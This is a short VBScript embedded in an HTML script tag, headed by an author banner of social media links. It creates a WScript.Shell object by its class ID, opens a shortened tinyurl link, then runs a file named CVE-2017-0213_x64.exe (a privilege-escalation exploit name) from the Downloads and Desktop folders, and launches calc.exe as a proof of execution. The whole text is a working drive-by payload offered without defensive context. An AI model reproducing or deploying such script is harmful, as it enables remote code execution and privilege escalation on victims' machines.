#################################################################################
# Twitter www.Twitter.com/GihadAlkmaty
# Github www.Github.com/JihadLkmaty218
# facebook www.facebook.com/GihadAlkmatySy
# Page in facebook www.facebook.com/GihadAlkmaty-hak5
#-------------------------------------------------------
#
# 
#  
#
#
#
#
####################################################################################
<script language="VBScript">
Set wscript = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
wscript.Run("https://tinyurl.com/ybpq7lkh")
wscript.Run("C:\Users\Usename\Downloads\CVE-2017-0213_x64.exe")
wscript.Run("C:\Users\Usename\Desktop\CVE-2017-0213_x64.exe")
wscript.Run("calc.exe")
</script>
